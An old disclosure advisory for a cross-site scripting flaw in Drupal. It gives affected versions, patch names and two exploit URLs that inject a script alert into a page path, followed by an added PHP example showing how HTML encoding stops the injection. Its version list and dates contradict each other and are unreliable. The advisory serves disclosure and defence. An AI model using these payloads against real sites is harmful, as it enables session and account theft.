Drupal XSS Vulnerability (main page and sub pages)
20.07.2003
Readers: 4,739
Daily readers: 2.7
------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attack is possible. An attacker could access other users' or the admin's Drupal accounts.

------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com

Drupal is an open-source platform and content management system for building dynamic web sites offering a broad range of features and services including user administration, publishing workflow, discussion capabilities, news aggregation, metadata functionalities using controlled vocabularies and XML publishing for content sharing purposes. Equipped with a powerful blend of features and configurability, Drupal can support a diverse range of web projects ranging from personal weblogs to large community-driven sites.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
Drupal 4.2.0 RC

NOT TESTED - 90% VULNERABLE;
Drupal 4.1.0
Drupal 4.0.0
Drupal 3.0.2
Drupal 3.0.1
Drupal 3.0.0
Drupal 2.0.0
Drupal 1.0.0

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.

------------------------------------------------------
Solution & Patches;
------------------------------------------------------
download : http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip

xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch

[All files provided by Vendor]

------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["

------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>

Replace "<>","[]"

------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor
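
The "Exploit - 2" URL only has an effect if the request path reaches the page markup unencoded. The advisory does not show the affected Drupal code, so the following is an added example (not Drupal's code and not the vendor patch) that assumes the path is echoed into a double-quoted HTML attribute, and compares that with an encoded version. All function names are hypothetical.

```php
<?php
// Added illustration, not Drupal source. Function names are hypothetical.
// Assumption: the page template echoes the request path into a
// double-quoted HTML attribute.

// Unescaped: a '"' in the path closes the attribute and '>' closes the tag.
function render_form_unsafe(string $path): string
{
    return '<form action="' . $path . '" method="post"></form>';
}

// Encoded for the attribute context: quotes and angle brackets become entities.
function render_form_safe(string $path): string
{
    $attr = htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $attr . '" method="post"></form>';
}

// Parse the markup with an HTML parser and count the <script> elements in it.
function count_script_elements(string $html): int
{
    libxml_use_internal_errors(true);   // tolerate the malformed unsafe output
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// Request paths: one benign, one taken from "Exploit - 2" in the advisory.
$paths = [
    '/node/view/666',
    '/node/view/666"><script>alert(document.domain)</script>',
];

foreach ($paths as $path) {
    printf("%-58s unsafe=%d safe=%d\n", $path,
        count_script_elements(render_form_unsafe($path)),
        count_script_elements(render_form_safe($path)));
}
```

A non-zero count in the unsafe column means the path content was parsed as markup rather than as an attribute value; the same check can serve as a regression test after applying the vendor patches.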
